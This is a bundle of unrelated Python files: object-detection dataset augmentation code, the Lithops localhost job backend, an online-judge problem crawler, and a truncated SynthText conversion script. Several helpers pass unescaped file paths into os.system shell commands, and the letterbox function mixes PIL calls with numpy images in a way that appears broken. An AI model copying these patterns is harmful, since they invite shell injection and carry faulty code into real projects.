l = np.array(
[x.split() for x in f.read().splitlines()], dtype=np.float32
) # labels
if len(l) == 0:
l = np.zeros((0, 5), dtype=np.float32)
x[img] = [l, shape]
except Exception as e:
x[img] = [None, None]
print("WARNING: %s: %s" % (img, e))
x["hash"] = get_hash(self.label_files + self.img_files)
torch.save(x, path) # save for next time
return x
def __len__(self):
return len(self.img_files)
# def __iter__(self):
# self.count = -1
# print('ran dataset iter')
# #self.shuffled_vector = np.random.permutation(self.nF) if self.augment else np.arange(self.nF)
# return self
def __getitem__(self, index):
if self.image_weights:
index = self.indices[index]
hyp = self.hyp
mosaic = self.mosaic and random.random() < hyp["mosaic"]
if mosaic:
# Load mosaic
img, labels = load_mosaic(self, index)
shapes = None
# MixUp https://arxiv.org/pdf/1710.09412.pdf
if random.random() < hyp["mixup"]:
img2, labels2 = load_mosaic(
self, random.randint(0, len(self.labels) - 1)
)
r = np.random.beta(8.0, 8.0) # mixup ratio, alpha=beta=8.0
img = (img * r + img2 * (1 - r)).astype(np.uint8)
labels = np.concatenate((labels, labels2), 0)
else:
# Load image
img, (h0, w0), (h, w) = load_image(self, index)
# Letterbox
shape = (
self.batch_shapes[self.batch[index]] if self.rect else self.img_size
) # final letterboxed shape
img, ratio, pad = letterbox(img, shape, auto=False, scaleup=self.augment)
shapes = (h0, w0), ((h / h0, w / w0), pad) # for COCO mAP rescaling
# Load labels
labels = []
x = self.labels[index]
if x.size > 0:
# Normalized xywh to pixel xyxy format
labels = x.copy()
labels[:, 1] = (
ratio[0] * w * (x[:, 1] - x[:, 3] / 2) + pad[0]
) # pad width
labels[:, 2] = (
ratio[1] * h * (x[:, 2] - x[:, 4] / 2) + pad[1]
) # pad height
labels[:, 3] = ratio[0] * w * (x[:, 1] + x[:, 3] / 2) + pad[0]
labels[:, 4] = ratio[1] * h * (x[:, 2] + x[:, 4] / 2) + pad[1]
if self.augment:
# Augment imagespace
if not mosaic:
img, labels = random_perspective(
img,
labels,
degrees=hyp["degrees"],
translate=hyp["translate"],
scale=hyp["scale"],
shear=hyp["shear"],
perspective=hyp["perspective"],
)
# Augment colorspace
augment_hsv(img, hgain=hyp["hsv_h"], sgain=hyp["hsv_s"], vgain=hyp["hsv_v"])
# Apply cutouts
# if random.random() < 0.9:
# labels = cutout(img, labels)
nL = len(labels) # number of labels
if nL:
labels[:, 1:5] = xyxy2xywh(labels[:, 1:5]) # convert xyxy to xywh
labels[:, [2, 4]] /= img.shape[0] # normalized height 0-1
labels[:, [1, 3]] /= img.shape[1] # normalized width 0-1
if self.augment:
# flip up-down
if random.random() < hyp["flipud"]:
img = np.flipud(img)
if nL:
labels[:, 2] = 1 - labels[:, 2]
# flip left-right
if random.random() < hyp["fliplr"]:
img = np.fliplr(img)
if nL:
labels[:, 1] = 1 - labels[:, 1]
labels_out = torch.zeros((nL, 6))
if nL:
labels_out[:, 1:] = torch.from_numpy(labels)
# Convert
img = img[:, :, ::-1].transpose(2, 0, 1) # BGR to RGB, to 3x416x416
img = np.ascontiguousarray(img)
return torch.from_numpy(img), labels_out, self.img_files[index], shapes
@staticmethod
def collate_fn(batch):
img, label, path, shapes = zip(*batch) # transposed
for i, l in enumerate(label):
l[:, 0] = i # add target image index for build_targets()
return torch.stack(img, 0), torch.cat(label, 0), path, shapes
# Ancillary functions --------------------------------------------------------------------------------------------------
def load_image(self, index):
# loads 1 image from dataset, returns img, original hw, resized hw
img = self.imgs[index]
if img is None: # not cached
path = self.img_files[index]
img = cv2.imread(path) # BGR
assert img is not None, "Image Not Found " + path
h0, w0 = img.shape[:2] # orig hw
r = self.img_size / max(h0, w0) # resize image to img_size
if r != 1: # always resize down, only resize up if training with augmentation
interp = cv2.INTER_AREA if r < 1 and not self.augment else cv2.INTER_LINEAR
img = cv2.resize(img, (int(w0 * r), int(h0 * r)), interpolation=interp)
return img, (h0, w0), img.shape[:2] # img, hw_original, hw_resized
else:
return (
self.imgs[index],
self.img_hw0[index],
self.img_hw[index],
) # img, hw_original, hw_resized
def augment_hsv(img, hgain=0.5, sgain=0.5, vgain=0.5):
r = np.random.uniform(-1, 1, 3) * [hgain, sgain, vgain] + 1 # random gains
hue, sat, val = cv2.split(cv2.cvtColor(img, cv2.COLOR_BGR2HSV))
dtype = img.dtype # uint8
x = np.arange(0, 256, dtype=np.int16)
lut_hue = ((x * r[0]) % 180).astype(dtype)
lut_sat = np.clip(x * r[1], 0, 255).astype(dtype)
lut_val = np.clip(x * r[2], 0, 255).astype(dtype)
img_hsv = cv2.merge(
(cv2.LUT(hue, lut_hue), cv2.LUT(sat, lut_sat), cv2.LUT(val, lut_val))
).astype(dtype)
cv2.cvtColor(img_hsv, cv2.COLOR_HSV2BGR, dst=img) # no return needed
# Histogram equalization
# if random.random() < 0.2:
# for i in range(3):
# img[:, :, i] = cv2.equalizeHist(img[:, :, i])
def load_mosaic(self, index):
# loads images in a mosaic
labels4 = []
s = self.img_size
yc, xc = [
int(random.uniform(-x, 2 * s + x)) for x in self.mosaic_border
] # mosaic center x, y
indices = [index] + [
random.randint(0, len(self.labels) - 1) for _ in range(3)
] # 3 additional image indices
for i, index in enumerate(indices):
# Load image
img, _, (h, w) = load_image(self, index)
# place img in img4
if i == 0: # top left
img4 = np.full(
(s * 2, s * 2, img.shape[2]), 114, dtype=np.uint8
) # base image with 4 tiles
x1a, y1a, x2a, y2a = (
max(xc - w, 0),
max(yc - h, 0),
xc,
yc,
) # xmin, ymin, xmax, ymax (large image)
x1b, y1b, x2b, y2b = (
w - (x2a - x1a),
h - (y2a - y1a),
w,
h,
) # xmin, ymin, xmax, ymax (small image)
elif i == 1: # top right
x1a, y1a, x2a, y2a = xc, max(yc - h, 0), min(xc + w, s * 2), yc
x1b, y1b, x2b, y2b = 0, h - (y2a - y1a), min(w, x2a - x1a), h
elif i == 2: # bottom left
x1a, y1a, x2a, y2a = max(xc - w, 0), yc, xc, min(s * 2, yc + h)
x1b, y1b, x2b, y2b = w - (x2a - x1a), 0, w, min(y2a - y1a, h)
elif i == 3: # bottom right
x1a, y1a, x2a, y2a = xc, yc, min(xc + w, s * 2), min(s * 2, yc + h)
x1b, y1b, x2b, y2b = 0, 0, min(w, x2a - x1a), min(y2a - y1a, h)
img4[y1a:y2a, x1a:x2a] = img[y1b:y2b, x1b:x2b] # img4[ymin:ymax, xmin:xmax]
padw = x1a - x1b
padh = y1a - y1b
# Labels
x = self.labels[index]
labels = x.copy()
if x.size > 0: # Normalized xywh to pixel xyxy format
labels[:, 1] = w * (x[:, 1] - x[:, 3] / 2) + padw
labels[:, 2] = h * (x[:, 2] - x[:, 4] / 2) + padh
labels[:, 3] = w * (x[:, 1] + x[:, 3] / 2) + padw
labels[:, 4] = h * (x[:, 2] + x[:, 4] / 2) + padh
labels4.append(labels)
# Concat/clip labels
if len(labels4):
labels4 = np.concatenate(labels4, 0)
np.clip(
labels4[:, 1:], 0, 2 * s, out=labels4[:, 1:]
) # use with random_perspective
# img4, labels4 = replicate(img4, labels4) # replicate
# Augment
img4, labels4 = random_perspective(
img4,
labels4,
degrees=self.hyp["degrees"],
translate=self.hyp["translate"],
scale=self.hyp["scale"],
shear=self.hyp["shear"],
perspective=self.hyp["perspective"],
border=self.mosaic_border,
) # border to remove
return img4, labels4
def replicate(img, labels):
# Replicate labels
h, w = img.shape[:2]
boxes = labels[:, 1:].astype(int)
x1, y1, x2, y2 = boxes.T
s = ((x2 - x1) + (y2 - y1)) / 2 # side length (pixels)
for i in s.argsort()[: round(s.size * 0.5)]: # smallest indices
x1b, y1b, x2b, y2b = boxes[i]
bh, bw = y2b - y1b, x2b - x1b
yc, xc = int(random.uniform(0, h - bh)), int(
random.uniform(0, w - bw)
) # offset x, y
x1a, y1a, x2a, y2a = [xc, yc, xc + bw, yc + bh]
img[y1a:y2a, x1a:x2a] = img[y1b:y2b, x1b:x2b] # img4[ymin:ymax, xmin:xmax]
labels = np.append(labels, [[labels[i, 0], x1a, y1a, x2a, y2a]], axis=0)
return img, labels
def letterbox(
img,
new_shape=(640, 640),
color=(114, 114, 114),
auto=True,
scaleFill=False,
scaleup=True,
):
# Resize image to a 32-pixel-multiple rectangle https://github.com/ultralytics/yolov3/issues/232
# shape = img.shape[:2] # current shape [height, width]
shape = (img.size[1], img.size[0])
if isinstance(new_shape, int):
new_shape = (new_shape, new_shape)
# Scale ratio (new / old)
r = min(new_shape[0] / shape[0], new_shape[1] / shape[1])
if not scaleup: # only scale down, do not scale up (for better test mAP)
r = min(r, 1.0)
# Compute padding
ratio = r, r # width, height ratios
new_unpad = int(round(shape[1] * r)), int(round(shape[0] * r))
dw, dh = new_shape[1] - new_unpad[0], new_shape[0] - new_unpad[1] # wh padding
if auto: # minimum rectangle
dw, dh = np.mod(dw, 32), np.mod(dh, 32) # wh padding
elif scaleFill: # stretch
dw, dh = 0.0, 0.0
new_unpad = (new_shape[1], new_shape[0])
ratio = new_shape[1] / shape[1], new_shape[0] / shape[0] # width, height ratios
dw /= 2 # divide padding into 2 sides
dh /= 2
if shape[::-1] != new_unpad: # resize
# img = cv2.resize(img, new_unpad, interpolation=cv2.INTER_LINEAR)
img = img.resize(new_unpad, resample=Image.LINEAR)
top, bottom = int(round(dh - 0.1)), int(round(dh + 0.1))
left, right = int(round(dw - 0.1)), int(round(dw + 0.1))
# img = cv2.copyMakeBorder(img, top, bottom, left, right, cv2.BORDER_CONSTANT, value=color) # add border
img = ImageOps.expand(img, (left, top, right, bottom),114)
return img, ratio, (dw, dh)
def random_perspective(
img,
targets=(),
degrees=10,
translate=0.1,
scale=0.1,
shear=10,
perspective=0.0,
border=(0, 0),
):
# torchvision.transforms.RandomAffine(degrees=(-10, 10), translate=(.1, .1), scale=(.9, 1.1), shear=(-10, 10))
# targets = [cls, xyxy]
height = img.shape[0] + border[0] * 2 # shape(h,w,c)
width = img.shape[1] + border[1] * 2
# Center
C = np.eye(3)
C[0, 2] = -img.shape[1] / 2 # x translation (pixels)
C[1, 2] = -img.shape[0] / 2 # y translation (pixels)
# Perspective
P = np.eye(3)
P[2, 0] = random.uniform(-perspective, perspective) # x perspective (about y)
P[2, 1] = random.uniform(-perspective, perspective) # y perspective (about x)
# Rotation and Scale
R = np.eye(3)
a = random.uniform(-degrees, degrees)
# a += random.choice([-180, -90, 0, 90]) # add 90deg rotations to small rotations
s = random.uniform(1 - scale, 1 + scale)
# s = 2 ** random.uniform(-scale, scale)
R[:2] = cv2.getRotationMatrix2D(angle=a, center=(0, 0), scale=s)
# Shear
S = np.eye(3)
S[0, 1] = math.tan(random.uniform(-shear, shear) * math.pi / 180) # x shear (deg)
S[1, 0] = math.tan(random.uniform(-shear, shear) * math.pi / 180) # y shear (deg)
# Translation
T = np.eye(3)
T[0, 2] = (
random.uniform(0.5 - translate, 0.5 + translate) * width
) # x translation (pixels)
T[1, 2] = (
random.uniform(0.5 - translate, 0.5 + translate) * height
) # y translation (pixels)
# Combined rotation matrix
M = T @ S @ R @ P @ C # order of operations (right to left) is IMPORTANT
if (border[0] != 0) or (border[1] != 0) or (M != np.eye(3)).any(): # image changed
if perspective:
img = cv2.warpPerspective(
img, M, dsize=(width, height), borderValue=(114, 114, 114)
)
else: # affine
img = cv2.warpAffine(
img, M[:2], dsize=(width, height), borderValue=(114, 114, 114)
)
# Visualize
# import matplotlib.pyplot as plt
# ax = plt.subplots(1, 2, figsize=(12, 6))[1].ravel()
# ax[0].imshow(img[:, :, ::-1]) # base
# ax[1].imshow(img2[:, :, ::-1]) # warped
# Transform label coordinates
n = len(targets)
if n:
# warp points
xy = np.ones((n * 4, 3))
xy[:, :2] = targets[:, [1, 2, 3, 4, 1, 4, 3, 2]].reshape(
n * 4, 2
) # x1y1, x2y2, x1y2, x2y1
xy = xy @ M.T # transform
if perspective:
xy = (xy[:, :2] / xy[:, 2:3]).reshape(n, 8) # rescale
else: # affine
xy = xy[:, :2].reshape(n, 8)
# create new boxes
x = xy[:, [0, 2, 4, 6]]
y = xy[:, [1, 3, 5, 7]]
xy = np.concatenate((x.min(1), y.min(1), x.max(1), y.max(1))).reshape(4, n).T
# # apply angle-based reduction of bounding boxes
# radians = a * math.pi / 180
# reduction = max(abs(math.sin(radians)), abs(math.cos(radians))) ** 0.5
# x = (xy[:, 2] + xy[:, 0]) / 2
# y = (xy[:, 3] + xy[:, 1]) / 2
# w = (xy[:, 2] - xy[:, 0]) * reduction
# h = (xy[:, 3] - xy[:, 1]) * reduction
# xy = np.concatenate((x - w / 2, y - h / 2, x + w / 2, y + h / 2)).reshape(4, n).T
# clip boxes
xy[:, [0, 2]] = xy[:, [0, 2]].clip(0, width)
xy[:, [1, 3]] = xy[:, [1, 3]].clip(0, height)
# filter candidates
i = box_candidates(box1=targets[:, 1:5].T * s, box2=xy.T)
targets = targets[i]
targets[:, 1:5] = xy[i]
return img, targets
def box_candidates(
box1, box2, wh_thr=2, ar_thr=20, area_thr=0.1
): # box1(4,n), box2(4,n)
# Compute candidate boxes: box1 before augment, box2 after augment, wh_thr (pixels), aspect_ratio_thr, area_ratio
w1, h1 = box1[2] - box1[0], box1[3] - box1[1]
w2, h2 = box2[2] - box2[0], box2[3] - box2[1]
ar = np.maximum(w2 / (h2 + 1e-16), h2 / (w2 + 1e-16)) # aspect ratio
return (
(w2 > wh_thr)
& (h2 > wh_thr)
& (w2 * h2 / (w1 * h1 + 1e-16) > area_thr)
& (ar < ar_thr)
) # candidates
def cutout(image, labels):
# Applies image cutout augmentation https://arxiv.org/abs/1708.04552
h, w = image.shape[:2]
def bbox_ioa(box1, box2):
# Returns the intersection over box2 area given box1, box2. box1 is 4, box2 is nx4. boxes are x1y1x2y2
box2 = box2.transpose()
# Get the coordinates of bounding boxes
b1_x1, b1_y1, b1_x2, b1_y2 = box1[0], box1[1], box1[2], box1[3]
b2_x1, b2_y1, b2_x2, b2_y2 = box2[0], box2[1], box2[2], box2[3]
# Intersection area
inter_area = (np.minimum(b1_x2, b2_x2) - np.maximum(b1_x1, b2_x1)).clip(0) * (
np.minimum(b1_y2, b2_y2) - np.maximum(b1_y1, b2_y1)
).clip(0)
# box2 area
box2_area = (b2_x2 - b2_x1) * (b2_y2 - b2_y1) + 1e-16
# Intersection over box2 area
return inter_area / box2_area
# create random masks
scales = (
[0.5] * 1 + [0.25] * 2 + [0.125] * 4 + [0.0625] * 8 + [0.03125] * 16
) # image size fraction
for s in scales:
mask_h = random.randint(1, int(h * s))
mask_w = random.randint(1, int(w * s))
# box
xmin = max(0, random.randint(0, w) - mask_w // 2)
ymin = max(0, random.randint(0, h) - mask_h // 2)
xmax = min(w, xmin + mask_w)
ymax = min(h, ymin + mask_h)
# apply random color mask
image[ymin:ymax, xmin:xmax] = [random.randint(64, 191) for _ in range(3)]
# return unobscured labels
if len(labels) and s > 0.03:
box = np.array([xmin, ymin, xmax, ymax], dtype=np.float32)
ioa = bbox_ioa(box, labels[:, 1:5]) # intersection over area
labels = labels[ioa < 0.60] # remove >60% obscured labels
return labels
def reduce_img_size(
path="path/images", img_size=1024
): # from utils.datasets import *; reduce_img_size()
# creates a new ./images_reduced folder with reduced size images of maximum size img_size
path_new = path + "_reduced" # reduced images path
create_folder(path_new)
for f in tqdm(glob.glob("%s/*.*" % path)):
try:
img = cv2.imread(f)
h, w = img.shape[:2]
r = img_size / max(h, w) # size ratio
if r < 1.0:
img = cv2.resize(
img, (int(w * r), int(h * r)), interpolation=cv2.INTER_AREA
) # _LINEAR fastest
fnew = f.replace(path, path_new) # .replace(Path(f).suffix, '.jpg')
cv2.imwrite(fnew, img)
except:
print("WARNING: image failure %s" % f)
def recursive_dataset2bmp(
dataset="path/dataset_bmp",
): # from utils.datasets import *; recursive_dataset2bmp()
# Converts dataset to bmp (for faster training)
formats = [x.lower() for x in img_formats] + [x.upper() for x in img_formats]
for a, b, files in os.walk(dataset):
for file in tqdm(files, desc=a):
p = a + "/" + file
s = Path(file).suffix
if s == ".txt": # replace text
with open(p, "r") as f:
lines = f.read()
for f in formats:
lines = lines.replace(f, ".bmp")
with open(p, "w") as f:
f.write(lines)
elif s in formats: # replace image
cv2.imwrite(p.replace(s, ".bmp"), cv2.imread(p))
if s != ".bmp":
os.system("rm '%s'" % p)
def imagelist2folder(
path="path/images.txt",
): # from utils.datasets import *; imagelist2folder()
# Copies all the images in a text file (list of images) into a folder
create_folder(path[:-4])
with open(path, "r") as f:
for line in f.read().splitlines():
os.system('cp "%s" %s' % (line, path[:-4]))
print(line)
def create_folder(path="./new"):
# Create folder
if os.path.exists(path):
shutil.rmtree(path) # delete output folder
os.makedirs(path) # make new output folder
|
localhost.py
|
#
# (C) Copyright Cloudlab URV 2021
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import os
import sys
import json
import queue
import lithops
import logging
import shutil
import threading
import subprocess as sp
from shutil import copyfile
from lithops.constants import TEMP, LITHOPS_TEMP_DIR, COMPUTE_CLI_MSG, RN_LOG_FILE, JOBS_PREFIX
from lithops.utils import is_lithops_worker
logger = logging.getLogger(__name__)
RUNNER = os.path.join(LITHOPS_TEMP_DIR, 'runner.py')
LITHOPS_LOCATION = os.path.dirname(os.path.abspath(lithops.__file__))
class LocalhostHandler:
"""
A localhostHandler object is used by invokers and other components to access
underlying localhost backend without exposing the implementation details.
"""
def __init__(self, localhost_config):
logger.debug('Creating Localhost compute client')
self.config = localhost_config
self.jobs = {} # dict to store executed jobs (job_keys) and PIDs
self.env = {} # dict to store environments
self.job_queue = queue.Queue()
self.job_manager = None
self.should_run = True
msg = COMPUTE_CLI_MSG.format('Localhost compute')
logger.info("{}".format(msg))
def init(self):
"""
Init tasks for localhost
"""
pass
def start_manager(self):
"""
Starts manager thread to keep order in tasks
"""
def job_manager():
logger.debug('Staring localhost job manager')
self.should_run = True
while self.should_run:
job_payload, job_filename = self.job_queue.get()
if job_payload is None and job_filename is None:
break
executor_id = job_payload['executor_id']
job_id = job_payload['job_id']
job_key = job_payload['job_key']
runtime_name = job_payload['runtime_name']
env = self.get_env(runtime_name)
process = env.run(job_payload, job_filename)
self.jobs[job_key] = process
process.communicate() # blocks until the process finishes
logger.debug(f'ExecutorID {executor_id} | JobID {job_id} - Execution finished')
if self.job_queue.empty():
break
self.job_manager = None
logger.debug("Localhost job manager stopped")
if not self.job_manager:
self.job_manager = threading.Thread(target=job_manager)
self.job_manager.start()
def _get_env_type(self, runtime_name):
"""
Gets the environment type based on the runtime name
"""
return 'default' if '/' not in runtime_name else 'docker'
def get_env(self, runtime_name):
"""
Generates the proper runtime environment based on the runtime name
"""
if runtime_name not in self.env:
if '/' not in runtime_name:
env = DefaultEnv()
else:
pull_runtime = self.config.get('pull_runtime', False)
env = DockerEnv(runtime_name, pull_runtime)
env.setup()
self.env[runtime_name] = env
return self.env[runtime_name]
def create_runtime(self, runtime_name, *args):
"""
Extract the runtime metadata and preinstalled modules
"""
logger.info(f"Extracting preinstalled Python modules from {runtime_name}")
env = self.get_env(runtime_name)
runtime_metadata = env.preinstalls()
return runtime_metadata
def invoke(self, job_payload):
"""
Run the job description against the selected environment
"""
executor_id = job_payload['executor_id']
job_id = job_payload['job_id']
runtime_name = job_payload['runtime_name']
logger.debug(f'ExecutorID {executor_id} | JobID {job_id} - Putting job into localhost queue')
self.start_manager()
env = self.get_env(runtime_name)
job_filename = env._prepare_job_file(job_payload)
self.job_queue.put((job_payload, job_filename))
def get_runtime_key(self, runtime_name, *args):
"""
Generate the runtime key that identifies the runtime
"""
env_type = self._get_env_type(runtime_name)
runtime_key = os.path.join('localhost', env_type, runtime_name.strip("/"))
return runtime_key
def get_backend_type(self):
"""
Wrapper method that returns the type of the backend (Batch or FaaS)
"""
return 'batch'
def clean(self):
"""
Deletes all local runtimes
"""
pass
def clear(self, job_keys=None):
"""
Kills all running jobs processes
"""
self.should_run = False
while not self.job_queue.empty():
try:
self.job_queue.get(False)
except Exception:
pass
if job_keys:
for job_key in job_keys:
try:
# None means alive
if job_key not in self.jobs or \
self.jobs[job_key].poll() is not None:
continue
logger.debug(f'Killing job {job_key} with '
f'PID {self.jobs[job_key].pid}')
self.jobs[job_key].kill()
except Exception:
pass
else:
for job_key in self.jobs:
try:
if self.jobs[job_key].poll() is not None:
continue
logger.debug(f'Killing job {job_key} with '
f'PID {self.jobs[job_key].pid}')
self.jobs[job_key].kill()
except Exception:
pass
if self.job_manager:
self.job_queue.put((None, None))
class BaseEnv():
"""
Base environment class for shared methods
"""
def __init__(self, runtime):
self.runtime = runtime
def _copy_lithops_to_tmp(self):
if is_lithops_worker() and os.path.isfile(RUNNER):
return
os.makedirs(LITHOPS_TEMP_DIR, exist_ok=True)
try:
shutil.rmtree(os.path.join(LITHOPS_TEMP_DIR, 'lithops'))
except FileNotFoundError:
pass
shutil.copytree(LITHOPS_LOCATION, os.path.join(LITHOPS_TEMP_DIR, 'lithops'))
src_handler = os.path.join(LITHOPS_LOCATION, 'localhost', 'runner.py')
copyfile(src_handler, RUNNER)
def _prepare_job_file(self, job_payload):
"""
Creates the job file that contains the job payload to be executed
"""
job_key = job_payload['job_key']
storage_bucket = job_payload['config']['lithops']['storage_bucket']
local_job_dir = os.path.join(LITHOPS_TEMP_DIR, storage_bucket, JOBS_PREFIX)
docker_job_dir = f'/tmp/lithops/{storage_bucket}/{JOBS_PREFIX}'
job_file = f'{job_key}-job.json'
os.makedirs(local_job_dir, exist_ok=True)
local_job_filename = os.path.join(local_job_dir, job_file)
with open(local_job_filename, 'w') as jl:
json.dump(job_payload, jl, default=str)
if isinstance(self, DockerEnv):
job_filename = '{}/{}'.format(docker_job_dir, job_file)
else:
job_filename = local_job_filename
return job_filename
class DockerEnv(BaseEnv):
"""
Docker environment uses a docker runtime image
"""
def __init__(self, docker_image, pull_runtime):
logger.debug(f'Starting Docker Environment for {docker_image}')
super().__init__(runtime=docker_image)
self.pull_runtime = pull_runtime
def setup(self):
logger.debug(f'Setting up Docker environment')
self._copy_lithops_to_tmp()
if self.pull_runtime:
logger.debug('Pulling Docker runtime {}'.format(self.runtime))
sp.run('docker pull {}'.format(self.runtime), shell=True, check=True,
stdout=sp.PIPE, universal_newlines=True)
def preinstalls(self):
if not os.path.isfile(RUNNER):
self.setup()
cmd = (f'docker run --rm -v {TEMP}:/tmp --entrypoint "python3" '
f'{self.runtime} /tmp/lithops/runner.py preinstalls')
process = sp.run(cmd, shell=True, check=True, stdout=sp.PIPE, universal_newlines=True)
runtime_meta = json.loads(process.stdout.strip())
return runtime_meta
def run(self, job_payload, job_filename):
"""
Runs a job
"""
executor_id = job_payload['executor_id']
job_id = job_payload['job_id']
total_calls = len(job_payload['call_ids'])
logger.debug(f'ExecutorID {executor_id} | JobID {job_id} - Going to '
f'run {total_calls} activations in the localhost worker')
if not os.path.isfile(RUNNER):
self.setup()
cmd = (f'docker run --rm -v {TEMP}:/tmp --entrypoint "python3" '
f'{self.runtime} /tmp/lithops/runner.py run {job_filename}')
log = open(RN_LOG_FILE, 'a')
process = sp.Popen(cmd, shell=True, stdout=log, stderr=log)
return process
class DefaultEnv(BaseEnv):
"""
Default environment uses current python3 installation
"""
def __init__(self):
logger.debug(f'Starting Default Environment for {sys.executable}')
super().__init__(runtime=sys.executable)
def setup(self):
logger.debug(f'Setting up Default environment')
self._copy_lithops_to_tmp()
def preinstalls(self):
if not os.path.isfile(RUNNER):
self.setup()
cmd = f'"{self.runtime}" "{RUNNER}" preinstalls'
process = sp.run(cmd, shell=True, check=True, stdout=sp.PIPE, universal_newlines=True)
runtime_meta = json.loads(process.stdout.strip())
return runtime_meta
def run(self, job_payload, job_filename):
"""
Runs a job
"""
executor_id = job_payload['executor_id']
job_id = job_payload['job_id']
total_calls = len(job_payload['call_ids'])
logger.debug(f'ExecutorID {executor_id} | JobID {job_id} - Going to '
f'run {total_calls} activations in the localhost worker')
if not os.path.isfile(RUNNER):
self.setup()
cmd = f'"{self.runtime}" "{RUNNER}" run {job_filename}'
log = open(RN_LOG_FILE, 'a')
process = sp.Popen(cmd, shell=True, stdout=log, stderr=log)
return process
|
main.py
|
"""爬虫模块"""
import re
import threading
import time
import pymongo
import requests
import config
import support.HDU
import support.POJ
import support.SDUT
# Database
db = pymongo.MongoClient(config.dbhost)[config.dbname]
def crawl(oj, sid):
"""爬取一道题目并返回该题目的dict"""
# 下载题目页面
r = requests.get(oj.problem_url % sid, timeout=config.timeout)
r.encoding = oj.encoding
html = r.text
# 创建题目dict
problem = {
"soj": oj.name,
"sid": sid,
}
# 遍历regexp进行正则提取
for key, reg in oj.regexp.items():
match = re.findall(reg, html)
if not match:
problem[key] = ""
# Source字段可以为空
# if key == "source":
# problem["source"] = ""
# 其它字段只要没匹配到就直接返回None
# else:
# return None
else:
# 保存该字段的值
problem[key] = match[0]
# 将 timelimit memorylimit 从字符串转为整数
problem["timelimit"] = int(problem["timelimit"])
problem["memorylimit"] = int(problem["memorylimit"])
# 替换description的相对地址为绝对地址
problem["description"] = oj.replace_src(problem["description"])
return problem
def process(oj):
"""爬取某oj所有题目并保存到数据库"""
no_such_sid_times = 0
sid = oj.minid
while sid <= oj.maxid:
try:
# 调用函数爬取
problem = crawl(oj, sid)
# 没有抓取到
if not problem:
print("[NO MATCH] [SKIP] %s-%d" % (oj.name, sid))
# 如果oj里该题已经被删除 就确保本地数据库也删掉该题
db["problem"].delete_one({
"soj": oj.name,
"sid": sid,
})
sid += 1
continue
except ValueError:
print("[ERROR] No such sid %s-%d" % (oj.name, sid))
no_such_sid_times += 1
if no_such_sid_times >= 120:
print("[INFO] Continuous 120 problems from %s can not be crawled" % oj.name)
break
sid += 1
continue
except Exception as err:
# 有任何未知错误发生(网络超时等)都进行retry
print("[ERROR] [RETRY] %s-%d %s" % (oj.name, sid, err))
# 每秒retry一次
time.sleep(1)
# 这里不执行 sid += 1 实现了retry
continue
# 如果题目在数据库中已经存在
if db["problem"].find({
"soj": oj.name,
"sid": sid,
}).count():
# 不创建 只更新
db["problem"].update_one({
"soj": oj.name,
"sid": sid,
}, {
"$set": problem,
})
print("[SUCCESS] [UPDATE] %s-%d %s" % (oj.name, sid, problem["title"]))
else:
# 创建新题目
problem["totalsm"] = 0
problem["totalac"] = 0
db["problem"].insert_one(problem)
print("[SUCCESS] [CREATE] %s-%d %s" % (oj.name, sid, problem["title"]))
no_such_sid_times = 0
# 下一题
sid += 1
def process_with_threading():
thread_pool = []
thread_pool.append(threading.Thread(target=process, args=(support.HDU,)))
thread_pool.append(threading.Thread(target=process, args=(support.POJ,)))
thread_pool.append(threading.Thread(target=process, args=(support.SDUT,)))
for t in thread_pool:
t.start()
for t in thread_pool:
t.join()
print("Finished")
if __name__ == "__main__":
process_with_threading()
|
create_synthtext_nori.py
|
import os
import math
import argparse
import pickle
from PIL import Image
from multiprocessing import Process
import numpy as np
import cv2
import nori2 as nori
import scipy.io as sio
from tqdm import tqdm
def get_file_list(dir_path):
print('Getting file list: ')
file_list = []
for dir_1 in os.listdir(dir_path):
for dir_2 in os.listdir('{}/{}'.format(dir_path, dir_1)):
for f in os.listdir(os.path.join(dir_path, dir_1, dir_2)):
if f.endswith('.bin'):
file_list.append(os.path.join(dir_path, dir_1, dir_2, f))
print('Total: {}'.format(len(file_list)))
return file_list
def get_l2_dist(point1, point2):
'''
:param point1: tuple (x, y) int or float
:param point2: tuple (x, y)
:return: float
'''
return float(((point1[0] - point2[0])**2 + (point1[1] - point2[1])**2)**0.5)
def qual_square(char_box):
a = get_l2_dist(char_box[0], char_box[1])
b = get_l2_dist(char_box[1], char_box[2])
c = get_l2_dist(char_box[2], char_box[0])
p = (a + b + c) / 2
s = np.sqrt(p * (p - a) * (p - b) * (p - c))
a = get_l2_dist(char_box[2], char_box[3])
b = get_l2_dist(char_box[3], char_box[0])
p = (a + b + c) / 2
s += np.sqrt(p * (p - a) * (p - b) * (p - c))
return s
def sample_filter(char_box, word, aspect_ratio):
## remove the sample if it has char_area 0 in it.
char_box = np.array(char_box, dtype=np.int32)
char_box = char_box.T.reshape((-1, 4, 2))
char_box = np.clip(char_box, 0, math.inf)
for i in range(len(char_box)):
s = qual_square(char_box[i])
if s == 0:
return False
v1 = get_l2_dist(char_box[0][0], char_box[0][1])
v2 = get_l2_dist(char_box[0][1], char_box[0][2])
v3 = get_l2_dist(char_box[0][2], char_box[0][3])
v4 = get_l2_dist(char_box[0][3], char_box[0][0])
if v1 <= 1 or v2 <= 1 or v3 <= 1 or v4 <= 1:
return False
flag = True
if aspect_ratio < 0.2:
return False
if word == "":
return False
return True
def run_child(dest_path, file_list, job_no, margin_ratio, max_num):
dest_path = '{}/{}.nori'.format(dest_path, job_no)
if os.path.exists(dest_path):
os.system('rm -r {0}'.format(dest_path))
with nori.open(dest_path, 'w') as image_writer:
count = 0
for filename in file_list:
count += 1
if count > max_num:
break
if (count - 1) % 500 == 0:
print('Job {}: total: {}, generated: {}'.format(job_no, max_num, count - 1))
with open(filename, 'rb') as pklfile:
pkl = pickle.load(pklfile, encoding='latin1')
img = pkl['img'].copy()
img_height, img_width, _ = img.shape
word_bbs = np.array(pkl['contour'][1], dtype=np.int32)
word_bbs = np.split(word_bbs, len(word_bbs), 0)
word_bbs = [x.transpose([1, 0, 2]) for x in word_bbs]
char_bbs = np.array(pkl['contour'][0], dtype=np.int32)
chars = pkl['chars']
char_bb_index = 0
for i in range(len(word_bbs)):
bb = word_bbs[i]
word = chars[i]
bb = np.squeeze(bb, axis=1)
min_w, min_h = np.amin(bb, axis=0)
